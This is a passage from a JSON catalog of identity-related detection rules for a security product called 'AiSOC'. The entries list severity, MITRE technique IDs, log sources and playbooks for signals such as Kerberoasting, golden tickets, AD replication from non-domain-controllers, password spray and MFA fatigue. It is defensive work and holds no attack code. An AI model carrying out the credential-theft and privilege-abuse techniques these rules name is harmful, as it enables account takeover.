"identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/privileged-role-assignment.yaml" }, { "id": "det-identity-017", "type": "detection", "name": "Just-In-Time Elevation Held Beyond Window", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Just-In-Time Elevation Held Beyond Window'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/jit-elevation-abuse.yaml" }, { "id": "det-identity-018", "type": "detection", "name": "Sudo Used Without MFA", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Sudo Used Without MFA'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1548.003" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/sudo-no-mfa.yaml" }, { "id": "det-identity-019", "type": "detection", "name": "Active Directory Group Policy Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Active Directory Group Policy Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1484.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/group-policy-modification.yaml" }, { "id": "det-identity-020", "type": "detection", "name": "Kubernetes ClusterRoleBinding to cluster-admin", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Kubernetes ClusterRoleBinding to cluster-admin'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/rbac-cluster-admin-binding.yaml" }, { "id": "det-identity-021", "type": "detection", "name": "Defensive IAM Policy Detached", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Defensive IAM Policy Detached'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/iam-policy-detach-defense.yaml" }, { "id": "det-identity-022", "type": "detection", "name": "Domain Password Policy Weakened", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Domain Password Policy Weakened'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/domain-password-policy-weakened.yaml" }, { "id": "det-identity-023", "type": "detection", "name": "OAuth App Granted Broad Scopes by User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OAuth App Granted Broad Scopes by User'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "google-workspace", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/oauth-broad-scope-grant.yaml" }, { "id": "det-identity-024", "type": "detection", "name": "GitHub App Installed with Repo Admin Permission", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'GitHub App Installed with Repo Admin Permission'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "github", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/app-token-broad-default.yaml" }, { "id": "det-identity-025", "type": "detection", "name": "Persistent Session Token Reused from New Device Fingerprint", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Persistent Session Token Reused from New Device Fingerprint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550.004" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/token-reuse-new-device.yaml" }, { "id": "det-identity-026", "type": "detection", "name": "User Account Creation by Non-Admin Principal", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'User Account Creation by Non-Admin Principal'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1136.001" ], "log_source": "okta", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/account-creation-by-non-admin.yaml" }, { "id": "det-identity-027", "type": "detection", "name": "Privileged Account Deleted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Account Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1531" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/admin-account-deletion.yaml" }, { "id": "det-identity-028", "type": "detection", "name": "Disabled Account Re-enabled", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Disabled Account Re-enabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/account-enable-after-disable.yaml" }, { "id": "det-identity-029", "type": "detection", "name": "Admin Password Reset Initiated by Self via Self-Service", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Admin Password Reset Initiated by Self via Self-Service'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/self-password-reset-admin.yaml" }, { "id": "det-identity-030", "type": "detection", "name": "Password Reset Out of Business Hours for Privileged Account", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Password Reset Out of Business Hours for Privileged Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/password-reset-out-of-hours.yaml" }, { "id": "det-identity-031", "type": "detection", "name": "Active Directory Replication Request from Non-Domain-Controller", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Active Directory Replication Request from Non-Domain-Controller'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1003.006" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ad-replication-non-dc.yaml" }, { "id": "det-identity-032", "type": "detection", "name": "Kerberoasting (Service-Ticket Request for SPN)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Kerberoasting (Service-Ticket Request for SPN)'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1558.003" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/kerberoasting.yaml" }, { "id": "det-identity-033", "type": "detection", "name": "AS-REP Roasting (Account with Pre-Auth Disabled)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AS-REP Roasting (Account with Pre-Auth Disabled)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1558.004" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/asreproasting.yaml" }, { "id": "det-identity-034", "type": "detection", "name": "Golden Ticket Indicator (Anomalous TGT Lifetime)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Golden Ticket Indicator (Anomalous TGT Lifetime)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1558.001" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/golden-ticket.yaml" }, { "id": "det-identity-035", "type": "detection", "name": "Silver Ticket Indicator (Service Ticket Without TGS Hit)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Silver Ticket Indicator (Service Ticket Without TGS Hit)'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1558.002" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/silver-ticket.yaml" }, { "id": "det-identity-036", "type": "detection", "name": "SAML Response with Mismatched Issuer or Future-Dated NotBefore", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'SAML Response with Mismatched Issuer or Future-Dated NotBefore'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1606.002" ], "log_source": "okta", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/saml-response-anomaly.yaml" }, { "id": "det-identity-037", "type": "detection", "name": "Federation Trust Relationship Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Federation Trust Relationship Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556.007" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/federated-trust-modified.yaml" }, { "id": "det-identity-038", "type": "detection", "name": "IDP Metadata or Signing Cert Changed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'IDP Metadata or Signing Cert Changed'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/idp-metadata-changed.yaml" }, { "id": "det-identity-039", "type": "detection", "name": "Conditional Access Policy Scope Broadened (Less Restrictive)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Conditional Access Policy Scope Broadened (Less Restrictive)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1562.001" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ca-policy-scope-broadened.yaml" }, { "id": "det-identity-040", "type": "detection", "name": "Cross-Tenant Identity Access Granted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Cross-Tenant Identity Access Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1199" ], "log_source": "azure", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/federation-cross-tenant-access.yaml" }, { "id": "det-identity-041", "type": "detection", "name": "Password Spray: Single IP, Many Targets, Few Tries Each", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Password Spray: Single IP, Many Targets, Few Tries Each'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.003" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-password-spray-many-targets.yaml" }, { "id": "det-identity-042", "type": "detection", "name": "Distributed Password Spray From Many IPs", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Distributed Password Spray From Many IPs'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.003" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-password-spray-distributed.yaml" }, { "id": "det-identity-043", "type": "detection", "name": "Credential Stuffing Pattern Against Login Endpoint", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Credential Stuffing Pattern Against Login Endpoint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.004" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-credstuffing-known-breached-list.yaml" }, { "id": "det-identity-044", "type": "detection", "name": "Successful Login After 50+ Recent Failures", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Successful Login After 50+ Recent Failures'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.001" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-bruteforce-success-after-failures.yaml" }, { "id": "det-identity-045", "type": "detection", "name": "Impossible Travel: Two Successful Logins <15m, >1000km", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Impossible Travel: Two Successful Logins <15m, >1000km'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-impossible-travel-15m.yaml" }, { "id": "det-identity-046", "type": "detection", "name": "Successful Login From Tor Exit Node", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Successful Login From Tor Exit Node'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1090.003" ], "log_source": "identity", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-tor-exit-login-success.yaml" }, { "id": "det-identity-047", "type": "detection", "name": "Privileged User Login From Anonymising VPN", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged User Login From Anonymising VPN'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1090.003" ], "log_source": "identity", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-anon-vpn-login-priv-user.yaml" }, { "id": "det-identity-048", "type": "detection", "name": "MFA Fatigue Burst Against Single User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'MFA Fatigue Burst Against Single User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1621" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-mfa-fatigue-burst.yaml" }, { "id": "det-identity-049", "type": "detection", "name": "User Denied Push Then Approved Within 60s", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'User Denied Push Then Approved Within 60s'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1621" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-mfa-deny-then-success.yaml" }, { "id": "det-identity-050", "type": "detection", "name": "Account Locked Out 3+ Times In 1 Hour", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Account Locked Out 3+ Times In 1 Hour'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1110" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-account-locked-many-times.yaml" }, { "id": "det-identity-051", "type": "detection", "name": "Authentication Attempt Against Disabled User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Authentication Attempt Against Disabled User'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-disabled-user-auth-attempt.yaml" }, { "id": "det-identity-052", "type": "detection", "name": "Authentication Success For Recently Deleted User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Authentication Success For Recently Deleted User'.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-deleted-user-auth-success.yaml" }, { "id": "det-identity-053", "type": "detection", "name": "MFA Bypass Via Emergency / Backup Code", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'MFA Bypass Via Emergency / Backup Code'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-mfa-bypassed-via-emergency-code.yaml" }, { "id": "det-identity-054", "type": "detection", "name": "FIDO2 Hardware Key Removed From Privileged User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'FIDO2 Hardware Key Removed From Privileged User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-fido2-key-removed-priv.yaml" }, { "id": "det-identity-055", "type": "detection", "name": "FIDO2 Key Added And Old Key Removed In Same Session", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'FIDO2 Key Added And Old Key Removed In Same Session'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "identity", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-fido2-key-added-then-removed-old.yaml" }, { "id": "det-identity-056", "type": "detection", "name": "TOTP Secret QR-Code Re-Issued Without Old Factor Removal", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'TOTP Secret QR-Code Re-Issued Without Old Factor Removal'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-totp-secret-revealed.yaml" }, { "id": "det-identity-057", "type": "detection", "name": "Password Policy Min-Length / Complexity Loosened", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Password Policy Min-Length / Complexity Loosened'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-static-password-policy-loosened.yaml" }, { "id": "det-identity-058", "type": "detection", "name": "Password History Length Reduced", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Password History Length Reduced'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-password-policy-history-reduced.yaml" }, { "id": "det-identity-059", "type": "detection", "name": "Session Timeout Extended For Privileged Group", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Session Timeout Extended For Privileged Group'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-session-timeout-extended-priv.yaml" }, { "id": "det-identity-060", "type": "detection", "name": "Login With Headless / Bot User Agent", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login With Headless / Bot User Agent'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-suspicious-user-agent-login.yaml" }, { "id": "det-identity-061", "type": "detection", "name": "Login From ASN Recently Seen In Credential-Stuffing Activity", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login From ASN Recently Seen In Credential-Stuffing Activity'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1110.004" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-login-from-known-asn-ddos.yaml" }, { "id": "det-identity-062", "type": "detection", "name": "Privileged User Login From New Country", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged User Login From New Country'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-new-country-priv-user.yaml" }, { "id": "det-identity-063", "type": "detection", "name": "User Login Locale Switched Rapidly", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'User Login Locale Switched Rapidly'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-rapid-language-change.yaml" }, { "id": "det-identity-064", "type": "detection", "name": "Login With Empty User-Agent", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login With Empty User-Agent'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-empty-useragent-login.yaml" }, { "id": "det-identity-065", "type": "detection", "name": "TOTP Verification Repeatedly Skews Clock", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'TOTP Verification Repeatedly Skews Clock'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "identity", "mitre_techniques": [ "T1110" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-totp-skewed-clock.yaml" }, { "id": "det-identity-066", "type": "detection", "name": "Privileged Role Granted Outside Business Hours", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Role Granted Outside Business Hours'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-priv-role-grant-out-of-hours.yaml" }, { "id": "det-identity-067", "type": "detection", "name": "User Granted Privileged Role To Themselves", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'User Granted Privileged Role To Themselves'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-self-grant-priv-role.yaml" }, { "id": "det-identity-068", "type": "detection", "name": "Privileged Role Granted To Service Account", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Role Granted To Service Account'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-priv-role-grant-to-svc-account.yaml" }, { "id": "det-identity-069", "type": "detection", "name": "JIT/PIM Privileged Activation Self-Approved", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'JIT/PIM Privileged Activation Self-Approved'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-pim-activation-self-approval.yaml" }, { "id": "det-identity-070", "type": "detection", "name": "JIT/PIM Activation At Unusual Hour For User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'JIT/PIM Activation At Unusual Hour For User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-pim-activation-anomalous-time.yaml" }, { "id": "det-identity-071", "type": "detection", "name": "Privileged Role Grant Burst Across Many Users", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Role Grant Burst Across Many Users'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-priv-role-burst-granted.yaml" }, { "id": "det-identity-072", "type": "detection", "name": "Service Account Used For Interactive Login", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Service Account Used For Interactive Login'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-svc-account-interactive-login.yaml" }, { "id": "det-identity-073", "type": "detection", "name": "Service Account Login Without MFA In Region That Requires It", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Service Account Login Without MFA In Region That Requires It'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": 